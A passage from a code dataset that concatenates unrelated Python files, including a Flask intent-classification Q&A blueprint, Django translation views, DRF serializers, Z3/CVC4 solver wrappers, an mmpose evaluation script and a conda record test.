f.write(format_baseline_for_output(data) + '\n')
| StarcoderdataPython |
1953217 | from flask import Blueprint
from flask import request
from model import QuestionResult
from model2 import Question
from flask import jsonify
import threading
import kashgari
import jieba
import traceback
import tensorflow as tf
from keras import backend as kb
graph = tf.get_default_graph()
sess = tf.Session()
kb.set_session(sess)
from threading_functions import logToQuestion
questions = Blueprint('question', __name__)
CNNmodel = kashgari.utils.load_model("model2")
__dict_info__ = {
"发工资": 1,
"发薪通知": 7,
"实名": 6,
"工资条": 2,
"打卡": 5,
"授权": 3,
"用工单位": 4,
}
@questions.route("/test")
def test():
return "question test"
@questions.route("/ask", methods=["POST"])
def ask_question():
# question_answer 可能是html富文本
result = dict()
try:
__question: str = request.json.get('question')
print(__question)
# 这里判断意图,然后返回列表
# 测试意图为 1
x = list(jieba.cut(__question))
global graph, sess
with graph.as_default():
kb.set_session(sess)
y = CNNmodel.predict_top_k_class([x], top_k=3)[0]
print(y)
__intend_index = 0
_candidates = set()
result['data'] = []
result['code'] = 200
result['message'] = ""
if y['confidence'] > 0.5:
_label = y['label']
__intend_index = __dict_info__.get(_label, 0)
print(_label)
print(__intend_index)
for i in y['candidates']:
_label = i['label']
_candidates.add(__dict_info__.get(_label, 0))
_list = list(_candidates)
_list.append(__intend_index)
for _id in _list:
questions = Question.select().where(
(Question.question_type == _id)
& (Question.question_answer != "")).order_by(
Question.click_count.desc()).paginate(1, 5)
for q in questions:
if q.question_type == __intend_index:
result['data'].append(
QuestionResult(q.question_comment,
q.question_answer, q.question_id,
True).__dict__)
else:
result['data'].append(
QuestionResult(q.question_comment,
q.question_answer, q.question_id,
False).__dict__)
else:
print(y['confidence'])
# 这里新起一个线程存储question
t = threading.Thread(target=logToQuestion,
args=(__question, __intend_index))
t.run()
except:
traceback.print_exc()
result['data'] = []
result['code'] = 500
result['message'] = "参数异常"
return jsonify(result)
@questions.route("/hot")
def get_hot_question():
questions = Question(is_hot=1).select()
result = dict()
result['data'] = []
result['code'] = 200
result['message'] = ""
for q in questions:
result['data'].append(
QuestionResult(q.question_comment, q.question_answer,
q.question_id,False).__dict__)
return jsonify(result)
@questions.route("/addone", methods=["POST"])
def add_one():
"""{"questionId":1}
"""
try:
__id: int = request.json.get('questionId')
Question.update(click_count=Question.click_count +
1).where(Question.question_id == __id)
except:
pass
| StarcoderdataPython |
11247587 | #Escreva um programa que pergunte a quantidade de KM percorridos por carro alugado e a quantidade de dias pelos quais foi alugado.
#Calcule o preço a pagar , sabendo que o carro custa R$60 por dia e R$0,15 por Km rodado.
dias = int(input('Quantos dias alugados ? '))
km = float(input('Quantos KM rodados ? '))
valtotal = (dias * 60) + (km * 0.15)
print('Total a se pagar é de R${:.2f} reais'.format(valtotal)) | StarcoderdataPython |
3289243 | from acondbs.db.sa import sa
##__________________________________________________________________||
def test_import():
assert sa
##__________________________________________________________________||
| StarcoderdataPython |
170051 | from scipy.stats import beta
from matplotlib import pyplot as plt
import numpy as np
def samples(a, b, success, trials, num_episodes=100):
'''
:param a: the shape param for prior dist
:param b: the shape param for prior dist
:param success: num success in the experiments
:param trials: num trails conducted
:param num_episodes: num samples to draw from this distribution
:return:
'''
dist = beta(a+success, b+trials-success)
episodes = num_episodes
nums = [dist.rvs() for _ in range(episodes)]
return nums
def stats(nums):
avg = sum(nums)/len(nums)
var = sum(
[pow((x - avg), 2) for x in nums]
)
print(avg, var)
def plots(data, bin_size=20):
bins = np.arange(0, bin_size, 1) # fixed bin size
bins = bins/bin_size # normalize bins
num_plots = len(data)
for i, nums in enumerate(data):
plt.subplot(num_plots, 1, i+1)
# plot histogram
plt.hist(nums, bins=bins, alpha=0.5)
# hist = np.histogram(nums, bin_size)
plt.show()
'''
The conclusion is better prior requires less trails to converge.
Worse prior requires more trails to converge.
'''
successes = 3
trials =10
# alpha, beta defines the shape of beta dist, success and trials is number of experiments.
a, b = 1, 1 # uniform
num_episodes = 2000 # num samples sampled from distribution in order to draw distribution
bin_size = 100
container = []
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 0.5, 0.5 # convex shape prior
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 1.1, 30 # 0-0.2 prior
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 2, 5 # .0-0.8 prior
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
a, b = 2, 2 # bell shape between 0,1
ret = samples(a, b, successes, trials, num_episodes=num_episodes)
container.append(ret)
stats(ret)
plots(container, bin_size=bin_size) | StarcoderdataPython |
11289882 | # Copyright (C) 2019 <NAME>
#
# Distributed under terms of the MIT license.
IOTLAB_DOMAIN = "iot-lab.info"
| StarcoderdataPython |
12827281 | # Create your views here.
from django.shortcuts import render
from django.http import HttpResponse
from django.utils import translation
from django.utils.translation import ugettext_lazy as _
from django.utils.translation import pgettext_lazy as __
def index(request):
msg = _('안녕하세요요요')
# "구어"는 구분자 이다(아무거나 해도 됨)
msg2 = __("구어", "안녕안녕")
msg3 = f"{msg} {msg2}"
return HttpResponse(msg3)
def sample(request):
return render(request, 'sample/index.html')
# 언어 코드를 변경하는 뷰를 만들어 보기
# 1) url named group을 통해 language code 받기
from django.conf import settings
def trans1(request, code):
# 지원하는 언어 코드 목록을 만듬
languages = [language[0] for language in settings.LANGUAGES]
# 기본 언어 설정 가져오기
default_language = settings.LANGUAGE_CODE[:2]
if translation.LANGUAGE_SESSION_KEY in request.session:
del (request.session[translation.LANGUAGE_SESSION_KEY])
if code in languages and code != default_language:
translation.activate(code)
request.session[translation.LANGUAGE_SESSION_KEY] = code
else:
request.session[translation.LANGUAGE_SESSION_KEY] = default_language
code = default_language
return HttpResponse("Language Change to " + code)
# 2) 쿼리 스트링으로 language code 받기
def trans2(request):
code = request.GET.get('code')
if translation.LANGUAGE_SESSION_KEY in request.session:
del (request.session[translation.LANGUAGE_SESSION_KEY])
translation.activate(code)
request.session[translation.LANGUAGE_SESSION_KEY] = code
# 3) 언어별 설정 변경 뷰를 별도로 만들기
def trans_en(request):
code = 'en'
if translation.LANGUAGE_SESSION_KEY in request.session:
del (request.session[translation.LANGUAGE_SESSION_KEY])
translation.activate(code)
request.session[translation.LANGUAGE_SESSION_KEY] = code
def trans_ko(request):
code = 'en'
if translation.LANGUAGE_SESSION_KEY in request.session:
del (request.session[translation.LANGUAGE_SESSION_KEY])
translation.activate(code)
request.session[translation.LANGUAGE_SESSION_KEY] = code
| StarcoderdataPython |
4934907 | <reponame>maykinmedia/drf-polymorphic<filename>testapp/urls.py
from django.contrib import admin
from django.urls import include, path
from drf_spectacular.views import SpectacularYAMLAPIView
from .views import PetView
urlpatterns = [
path("admin/", admin.site.urls),
path(
"api/",
include(
[
path("", SpectacularYAMLAPIView.as_view(schema=None), name="schema"),
path("pets/", PetView.as_view(), name="pets"),
]
),
),
]
| StarcoderdataPython |
6597415 | from unittest.mock import patch
import shaystack
from shaystack import Quantity, Grid, VER_3_0, Ref
from shaystack.ops import HaystackHttpRequest
from shaystack.providers import ping
@patch.object(ping.Provider, 'point_write_write')
def test_point_write_write_with_zinc(mock) -> None:
# GIVEN
"""
Args:
mock:
"""
envs = {'HAYSTACK_PROVIDER': 'shaystack.providers.ping'}
mock.return_value = Grid(version=VER_3_0, columns=["level", "levelDis", "val", "who"])
mime_type = shaystack.MODE_ZINC
request = HaystackHttpRequest()
grid = shaystack.Grid(columns=['id', "level", "val", "who", "duration"])
grid.append({"id": Ref("1234"),
"level": 1,
"val": 100.0,
"who": "PPR",
"duration": Quantity(1, "min")})
request.headers["Content-Type"] = mime_type
request.headers["Accept"] = mime_type
request.body = shaystack.dump(grid, mode=mime_type)
# WHEN
response = shaystack.point_write(envs, request, "dev")
# THEN
mock.assert_called_once_with(Ref("1234"), 1, 100, "PPR", Quantity(1, "min"), None)
assert response.status_code == 200
assert response.headers["Content-Type"].startswith(mime_type)
assert shaystack.parse(response.body, mime_type) is not None
| StarcoderdataPython |
213777 | import os
import subprocess
import sys
from pathlib import Path
from threading import RLock
from typing import List, Optional
import distro
import i18n
from . import print_utils
BRAINFRAME_GROUP_ID = 1337
"""An arbitrary group ID value for the 'brainframe' group. We have to specify
the ID of the group manually to ensure that the host machine and the Docker
containers agree on it.
"""
class _CurrentCommand:
"""Contains information on the current command being run as a subprocess, if one
exists.
"""
_process: Optional[subprocess.Popen] = None
_lock = RLock()
_interrupted = False
@property
def process(self) -> Optional[subprocess.Popen]:
"""
:return: The currently running subprocess, or None if no subprocess is running
"""
with self._lock:
return self._process
@process.setter
def process(self, value: subprocess.Popen) -> None:
with self._lock:
if self._process is not None and self._process.poll() is None:
# This is never expected to happen, as subprocesses are run in serial
# and in a blocking fashion
raise RuntimeError("Only one process may be run at once")
self._process = value
@property
def interrupted(self) -> bool:
"""
:return: If true, the subprocess was interrupted by a signal
"""
return self._interrupted
def send_signal(self, sig: int):
"""
:param sig: The signal to send to the subprocess
"""
with self._lock:
if self._process is None:
message = (
"Attempted to send a signal when no process was running"
)
raise RuntimeError(message)
self._interrupted = True
self._process.send_signal(sig)
current_command = _CurrentCommand()
def create_group(group_name: str, group_id: int):
# Check if the group exists
result = run(["getent", "group", group_name], exit_on_failure=False)
if result.returncode == 0:
print_utils.translate("install.group-exists")
return
# Create the group
result = run(["groupadd", group_name, "--gid", str(group_id)])
if result.returncode != 0:
print_utils.fail_translate(
"install.create-group-failure", error=str(result.stderr)
)
def added_to_group(group_name):
"""Checks if the user has been added to the group, even if the group
addition hasn't been applied yet (i.e. by re-logging). Compare to
`currently_in_group`.
"""
result = run(
["id", "-Gn", _current_user()],
stdout=subprocess.PIPE,
encoding="utf-8",
print_command=False,
)
return group_name in result.stdout.readline().split()
def currently_in_group(group_name):
"""Checks if the user is currently in the group. This will be False if the
user was added to the group but the change hasn't been applied yet. Compare
to `added_to_group`.
"""
result = run(
["id", "-Gn"],
stdout=subprocess.PIPE,
encoding="utf-8",
print_command=False,
)
return group_name in result.stdout.readline().split()
def add_to_group(group_name):
print_utils.translate("general.adding-to-group", group=group_name)
run(["usermod", "-a", "-G", group_name, _current_user()])
def is_root():
return os.geteuid() == 0
def give_brainframe_group_rw_access(paths: List[Path]):
paths_str = [str(p) for p in paths]
run(["chgrp", "-R", "brainframe"] + paths_str)
run(["chmod", "-R", "g+rw"] + paths_str)
def _current_user():
# If the SUDO_USER environment variable allows us to get the username of
# the user running sudo instead of root. If they're not using sudo, we can
# just pull the username from $LOGNAME.
# "Why not use $USER here?" you might ask. Apparently $LOGNAME is a
# POSIX standard and $USER is not.
# https://unix.stackexchange.com/a/76369/117461
return os.environ.get("SUDO_USER", os.environ["LOGNAME"])
def run(
command: List[str],
print_command=True,
exit_on_failure=True,
*args,
**kwargs,
) -> subprocess.Popen:
"""A small wrapper around subprocess.run.
:param command: The command to run
:param print_command: If True, the command will be printed before being run
:param exit_on_failure: If True, the application will exit if the command
results in a non-zero exit code
"""
if print_command:
print_utils.print_color(" ".join(command), print_utils.Color.MAGENTA)
current_command.process = subprocess.Popen(command, *args, **kwargs)
current_command.process.wait()
if current_command.interrupted:
# A signal was sent to the command before it finished
print_utils.fail_translate("general.interrupted")
elif current_command.process.returncode != 0 and exit_on_failure:
# The command failed during normal execution
sys.exit(current_command.process.returncode)
return current_command.process
_SUPPORTED_DISTROS = {
"Ubuntu": ["18.04", "20.04"],
}
"""A dict whose keys are supported Linux distribution names and whose values
are all supported versions for that distribution.
"""
def is_supported() -> bool:
"""
:return: True if the user is on an officially supported Linux distribution
"""
name, version, _ = distro.linux_distribution()
return name in _SUPPORTED_DISTROS and version in _SUPPORTED_DISTROS[name]
| StarcoderdataPython |
9679731 | import matplotlib.pyplot as plt
class Path:
def __init__(self,
times=None,
links=None,
):
"""
A basic constructor for a ``Path`` object
:param times : A list of times corresponding to the links (first time = beginning ; last time = ending)
:param links : A list of links composing the path. (first node = source ; last node = destination)
"""
self.times = times
self.links = links
def add_link(self, l, t):
self.times.append(t)
self.links.append(l)
def length(self):
return len(self.links)
def duration(self):
return self.times[-1] - self.times[0]
def plot(self, S, color="#18036f",
markersize=10, dag=False, fig=None):
"""
Draw a path on the ``StreamGraph`` object *S*
:param S:
:param color:
:param markersize:
:param dag:
:param fig:
:return:
"""
if fig is None:
fig, ax = plt.subplots()
else:
ax = plt.gca()
if dag:
dag = S.condensation_dag()
dag.plot(node_to_label=S.node_to_label, ax=ax)
else:
S.plot(ax=ax)
# Plot Source
id_source = S.nodes.index(self.links[0][0])
plt.plot([self.times[0]], [id_source], color=color,
marker='o', alpha=0.8, markersize=markersize)
# Plot Destination
id_destination = S.nodes.index(self.links[-1][1])
plt.plot([self.times[-1]], [id_destination], color=color,
marker='o', alpha=0.8, markersize=markersize)
# Plot Path
for i in range(self.length()):
l = self.links[i]
t = self.times[i]
id1 = S.nodes.index(l[0])
id2 = S.nodes.index(l[1])
idmax = max(id1, id2)
idmin = min(id1, id2)
plt.vlines(t, ymin=idmin, ymax=idmax, linewidth=6, alpha=0.8, color=color)
if i != self.length() - 1:
plt.hlines(id2, xmin=t, xmax=self.times[i + 1],
linewidth=4, alpha=0.8, color=color)
# Plot marker
if t != self.times[i + 1]:
plt.plot([t], [id2], color=color,
marker='>', alpha=0.8, markersize=markersize)
if i != 0 and (t, id1) != (self.times[0], id_source) != (self.times[-1], id_destination):
# Plot marker
if id1 == idmin:
plt.plot([t], [id1], color=color,
marker='^', alpha=0.8, markersize=markersize)
else:
plt.plot([t], [id1], color=color,
marker='v', alpha=0.8, markersize=markersize)
plt.tight_layout()
return fig
def check_coherence(self, S):
for i in range(self.length()):
l = self.links[i]
l_ = (self.links[i][1], self.links[i][0]) # Inverse the order of the link
if l not in S.links and l_ not in S.links:
raise ValueError("Link : " + str(l) + " does not exists in the Stream Graph !")
else:
t = self.times[i]
if l in S.links:
id_link = S.links.index(l)
else:
id_link = S.links.index(l_)
is_present = False
for lt0, lt1 in zip(S.link_presence[id_link][::2], S.link_presence[id_link][1::2]):
if lt0 <= t <= lt1:
is_present = True
if not is_present:
raise ValueError("Link : " + str(l) + " does not exists at time " + str(t) + " !")
print("Check Path Coherence ok !")
return
| StarcoderdataPython |
154641 | """Test_qpushbutton module."""
import unittest
class TestQPushButton(unittest.TestCase):
"""TestQPushButton Class."""
def test_enabled(self) -> None:
"""Test if the control enabled/disabled."""
from pineboolib.q3widgets import qpushbutton
button = qpushbutton.QPushButton()
self.assertTrue(button.enabled)
button.enabled = False
self.assertFalse(button.enabled)
def test_label(self) -> None:
"""Test label."""
from pineboolib.q3widgets import qpushbutton
button = qpushbutton.QPushButton()
button.setTextLabel("etiqueta")
text: str = str(button.text) # type: ignore
self.assertEqual(text, "etiqueta")
| StarcoderdataPython |
5161669 | <reponame>Ugtan/spdx-online-tools
# -*- coding: utf-8 -*-
# Copyright (c) 2017 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
from django.contrib.auth.models import User, Group
from rest_framework import serializers
from api.models import ValidateFileUpload,ConvertFileUpload,CompareFileUpload,CheckLicenseFileUpload
class ValidateSerializer(serializers.HyperlinkedModelSerializer):
"""POST validate API request fields"""
owner = serializers.SlugRelatedField(
read_only=True,
slug_field='id'
)
class Meta:
model = ValidateFileUpload
fields = ('created', 'file', 'owner')
class ValidateSerializerReturn(serializers.ModelSerializer):
"""Response Fields to be returned to the user"""
class Meta:
model = ValidateFileUpload
fields = ('created', 'file', 'owner','result','status')
class ConvertSerializer(serializers.HyperlinkedModelSerializer):
"""POST convert API request fields"""
owner = serializers.SlugRelatedField(
read_only=True,
slug_field='id'
)
class Meta:
model = ConvertFileUpload
fields = ('created', 'file', 'owner','cfilename','from_format','to_format','tagToRdfFormat')
class ConvertSerializerReturn(serializers.ModelSerializer):
"""Response Fields to be returned to the user"""
class Meta:
model = ConvertFileUpload
fields = ('created', 'file', 'owner','result','from_format','to_format','tagToRdfFormat','cfilename','message','status')
class CompareSerializer(serializers.HyperlinkedModelSerializer):
"""POST compare API request fields"""
owner = serializers.SlugRelatedField(
read_only=True,
slug_field='id'
)
class Meta:
model = CompareFileUpload
fields = ('created', 'file1','file2', 'owner','rfilename')
class CompareSerializerReturn(serializers.ModelSerializer):
"""Response Fields to be returned to the user"""
class Meta:
model = CompareFileUpload
fields = ('created', 'file1','file2', 'owner','result','rfilename','message','status')
class CheckLicenseSerializer(serializers.HyperlinkedModelSerializer):
"""POST validate API request fields"""
owner = serializers.SlugRelatedField(
read_only=True,
slug_field='id'
)
class Meta:
model = CheckLicenseFileUpload
fields = ('created', 'file', 'owner')
class CheckLicenseSerializerReturn(serializers.ModelSerializer):
"""Response Fields to be returned to the user"""
class Meta:
model = CheckLicenseFileUpload
fields = ('created', 'file', 'owner','result','status')
| StarcoderdataPython |
384470 | <gh_stars>10-100
class ServiceReviewHistory:
def __init__(self, org_uuid, service_uuid, service_metadata, state, reviewed_by, reviewed_on, created_on,
updated_on):
self._org_uuid = org_uuid
self._service_uuid = service_uuid
self._service_metadata = service_metadata
self._state = state
self._reviewed_by = reviewed_by
self._reviewed_on = reviewed_on
self._created_on = created_on
self._updated_on = updated_on
def to_dict(self):
return {
"org_uuid": self._org_uuid,
"service_uuid": self._service_uuid,
"service_metadata": self._service_metadata,
"state": self._state,
"reviewed_by": self._reviewed_by,
"reviewed_on": self._reviewed_on,
"created_on": self._created_on,
"updated_on": self._updated_on
}
@property
def org_uuid(self):
return self._org_uuid
@property
def service_uuid(self):
return self._service_uuid
@property
def service_metadata(self):
return self._service_metadata
@property
def state(self):
return self._state
@property
def reviewed_by(self):
return self._reviewed_by
@property
def reviewed_on(self):
return self._reviewed_on
@property
def created_on(self):
return self._created_on
@property
def updated_on(self):
return self._updated_on
| StarcoderdataPython |
4824012 | from torch import nn as nn
import torch
from .initialized_conv1d import Initialized_Conv1d
class Highway(nn.Module):
def __init__(self, dropout, layer_num, size):
super().__init__()
self.n = layer_num
self.linear = nn.ModuleList([Initialized_Conv1d(size, size, relu=False, bias=True) for _ in range(self.n)])
self.gate = nn.ModuleList([Initialized_Conv1d(size, size, bias=True) for _ in range(self.n)])
self.dropout = nn.Dropout(dropout)
self.children()
def forward(self, x):
# x: shape [batch_size, hidden_size, length]
dropout = 0.1
for i in range(self.n):
gate = torch.sigmoid(self.gate[i](x))
nonlinear = self.linear[i](x)
nonlinear = self.dropout(nonlinear)
x = gate * nonlinear + (1 - gate) * x
return x
| StarcoderdataPython |
6483760 | # Copyright (c) 2017, Fundacion Dr. <NAME>
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import re
import subprocess
from barf.core.smt.smtsymbol import Bool
logger = logging.getLogger(__name__)
def _check_solver_installation(solver):
found = True
try:
_ = subprocess.check_output(["which", solver])
except subprocess.CalledProcessError as e:
if e.returncode == 0x1:
found = False
return found
class SmtSolverNotFound(Exception):
pass
class Z3Solver(object):
def __init__(self):
self._name = "z3"
self._status = "unknown"
self._declarations = {}
self._constraints = []
self._process = None
self._check_solver()
self._start_solver()
def _check_solver(self):
if not _check_solver_installation(self._name):
raise SmtSolverNotFound("{} solver is not installed".format(self._name))
def _start_solver(self):
self._process = subprocess.Popen("z3 -smt2 -in", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Set z3 declaration scopes.
self._write("(set-option :global-decls false)")
self._write("(set-logic QF_AUFBV)")
def _stop_solver(self):
if self._process:
self._process.kill()
self._process.wait()
self._process = None
def _write(self, command):
logger.debug("> %s", command)
self._process.stdin.writelines(command + "\n")
def _read(self):
response = self._process.stdout.readline()[:-1]
logger.debug("< %s", response)
return response
def __del__(self):
self._stop_solver()
def __str__(self):
declarations = [d.declaration for d in self._declarations.values()]
constraints = ["(assert {})".format(c) for c in self._constraints]
return "\n".join(declarations + constraints)
def add(self, constraint):
assert isinstance(constraint, Bool)
self._write("(assert {})".format(constraint))
self._constraints.append(constraint)
self._status = "unknown"
def check(self):
assert self._status in ("sat", "unsat", "unknown")
if self._status == "unknown":
self._write("(check-sat)")
self._status = self._read()
return self._status
def reset(self):
self._stop_solver()
self._status = "unknown"
self._declarations = {}
self._constraints = []
self._start_solver()
def get_value(self, expr):
assert self.check() == "sat"
self._write("(get-value ({}))".format(expr))
response = self._read()
regex = r"\(\(([^\s]+|\(.*\))\s#x([^\s]+)\)\)"
match = re.search(regex, response).groups()[1]
return int(match, 16)
def declare_fun(self, name, fun):
if name in self._declarations:
raise Exception("Symbol already declare.")
self._declarations[name] = fun
self._write(fun.declaration)
@property
def declarations(self):
return self._declarations
class CVC4Solver(object):
def __init__(self):
self._name = "cvc4"
self._status = "unknown"
self._declarations = {}
self._constraints = []
self._process = None
self._check_solver()
self._start_solver()
def _check_solver(self):
if not _check_solver_installation(self._name):
raise SmtSolverNotFound("{} solver is not installed".format(self._name))
def _start_solver(self):
self._process = subprocess.Popen("cvc4 --incremental --lang=smt2", shell=True,
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Set CVC4 declaration scopes.
self._write("(set-logic QF_AUFBV)")
self._write("(set-option :produce-models true)")
def _stop_solver(self):
if self._process:
self._process.kill()
self._process.wait()
self._process = None
def _write(self, command):
logger.debug("> %s", command)
self._process.stdin.writelines(command + "\n")
def _read(self):
response = self._process.stdout.readline()[:-1]
logger.debug("< %s", response)
return response
def __del__(self):
self._stop_solver()
def __str__(self):
declarations = [d.declaration for d in self._declarations.values()]
constraints = ["(assert {})".format(c) for c in self._constraints]
return "\n".join(declarations + constraints)
def add(self, constraint):
assert isinstance(constraint, Bool)
self._write("(assert {})".format(constraint))
self._constraints.append(constraint)
self._status = "unknown"
def check(self):
assert self._status in ("sat", "unsat", "unknown")
if self._status == "unknown":
self._write("(check-sat)")
self._status = self._read()
return self._status
def reset(self):
self._stop_solver()
self._status = "unknown"
self._declarations = {}
self._constraints = []
self._start_solver()
def get_value(self, expr):
assert self.check() == "sat"
self._write("(get-value ({}))".format(expr))
response = self._read()
regex = r"\(\(([^\s]+|\(.*\))\s\(_\sbv([0-9]*)\s[0-9]*\)\)\)"
match = re.search(regex, response).groups()[1]
return int(match)
def declare_fun(self, name, fun):
if name in self._declarations:
raise Exception("Symbol already declare.")
self._declarations[name] = fun
self._write(fun.declaration)
@property
def declarations(self):
return self._declarations
| StarcoderdataPython |
1632843 | import argparse
import os
import os.path as osp
import mmcv
import torch
from mmcv.parallel import MMDataParallel, MMDistributedDataParallel
from mmcv.runner import get_dist_info, init_dist, load_checkpoint
from mmpose.apis import multi_gpu_test, single_gpu_test
from mmpose.core import wrap_fp16_model
from mmpose.datasets import build_dataloader, build_dataset
from mmpose.models import build_posenet
# for test-dev
import json
import numpy as np
class NpEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, np.integer):
return int(obj)
elif isinstance(obj, np.floating):
return float(obj)
elif isinstance(obj, np.ndarray):
return obj.tolist()
else:
return super(NpEncoder, self).default(obj)
def parse_args():
parser = argparse.ArgumentParser(description='mmpose test model')
parser.add_argument('config', help='test config file path')
parser.add_argument('checkpoint', help='checkpoint file')
parser.add_argument('--out', help='output result file')
parser.add_argument(
'--eval',
default='mAP',
nargs='+',
help='evaluation metric, which depends on the dataset,'
' e.g., "mAP" for MSCOCO')
parser.add_argument(
'--gpu_collect',
action='store_true',
help='whether to use gpu to collect results')
parser.add_argument('--tmpdir', help='tmp dir for writing some results')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
return args
def merge_configs(cfg1, cfg2):
# Merge cfg2 into cfg1
# Overwrite cfg1 if repeated, ignore if value is None.
cfg1 = {} if cfg1 is None else cfg1.copy()
cfg2 = {} if cfg2 is None else cfg2
for k, v in cfg2.items():
if v:
cfg1[k] = v
return cfg1
def main():
args = parse_args()
cfg = mmcv.Config.fromfile(args.config)
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
cfg.model.pretrained = None
cfg.data.test.test_mode = True
args.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
mmcv.mkdir_or_exist(osp.abspath(args.work_dir))
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# build the dataloader
# TODO: support multiple images per gpu (only minor changes are needed)
dataset = build_dataset(cfg.data.test, dict(test_mode=True))
data_loader = build_dataloader(
dataset,
samples_per_gpu=1,
workers_per_gpu=cfg.data.workers_per_gpu,
dist=distributed,
shuffle=False)
# build the model and load checkpoint
model = build_posenet(cfg.model)
fp16_cfg = cfg.get('fp16', None) # None
if fp16_cfg is not None:
wrap_fp16_model(model)
_ = load_checkpoint(model, args.checkpoint, map_location='cpu')
# for backward compatibility
if not distributed:
model = MMDataParallel(model, device_ids=[0])
outputs = single_gpu_test(model, data_loader)
else:
model = MMDistributedDataParallel(
model.cuda(),
device_ids=[torch.cuda.current_device()],
broadcast_buffers=False)
# print(args.gpu_collect) # False
outputs = multi_gpu_test(model, data_loader, args.tmpdir,
args.gpu_collect)
rank, _ = get_dist_info()
eval_config = cfg.get('eval_config', {})
eval_config = merge_configs(eval_config, dict(metric=args.eval))
args.out = args.work_dir + '/test_dev2017_results_kps.json'
if rank == 0:
if args.out:
# output_file_path = args.work_dir + '/outputs.json'
# print(f'\nwirting oututs to {output_file_path}')
# print(type(outputs)) # list,需要在rank=0下进行outputs的相关操作,因为outputs只有第一张卡有输出
# with open(output_file_path,'w') as f:
# json.dump(outputs, f, cls=NpEncoder) # 需要加个NpEncoder类,因为outputs中有np.array,而json无法将array写入json文件
print(f'\nwriting results to {args.out}')
results = []
for img in outputs:
for i, person in enumerate(img[0]):
kps = person[:, :3]
kps = kps.reshape((-1)).round(3).tolist()
kps = [round(k, 3) for k in kps] # 保留3位小数
# score = round(float(img[1][i]), 3) # 第5位是bbox_score,/mmpose/mmpose/models/detectors/top_down.py 272行
score = round(float(img[1][i][5]),3)
id = ''
for key in img[2][19:31]:
id = id + key
results.append({
'category_id': int(1),
'image_id': int(id),
'keypoints': kps,
'score': score
})
with open(args.out,'w') as fid:
json.dump(results, fid)
# mmcv.dump(outputs, args.out)
print(dataset.evaluate(outputs, args.work_dir, **eval_config))
if __name__ == '__main__':
main()
| StarcoderdataPython |
1649528 | <reponame>zhmsg/dms
#! /usr/bin/env python
# coding: utf-8
__author__ = 'ZhouHeng'
from TableTool import DBTool
dbt = DBTool("127.0.0.1")
dbt.create_from_dir(".")
# dbt.init_data_from_dir("Data")
| StarcoderdataPython |
258083 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
from logging import getLogger
from unittest import TestCase
from conda.base.context import context
from conda.common.compat import text_type
from conda.models.channel import Channel
from conda.models.index_record import IndexJsonRecord, PackageRecord
from conda.models.prefix_record import PrefixRecord
log = getLogger(__name__)
blas_value = 'accelerate' if context.subdir == 'osx-64' else 'openblas'
class PrefixRecordTests(TestCase):
def test_prefix_record_no_channel(self):
pr = PrefixRecord(
name='austin',
version='1.2.3',
build_string='py34_2',
build_number=2,
url="https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2",
subdir="win-32",
md5='0123456789',
files=(),
)
assert pr.url == "https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2"
assert pr.channel.canonical_name == 'defaults'
assert pr.subdir == "win-32"
assert pr.fn == "austin-1.2.3-py34_2.tar.bz2"
channel_str = text_type(Channel("https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2"))
assert channel_str == "https://repo.anaconda.com/pkgs/free/win-32"
assert dict(pr.dump()) == dict(
name='austin',
version='1.2.3',
build='py34_2',
build_number=2,
url="https://repo.anaconda.com/pkgs/free/win-32/austin-1.2.3-py34_2.tar.bz2",
md5='0123456789',
files=(),
channel=channel_str,
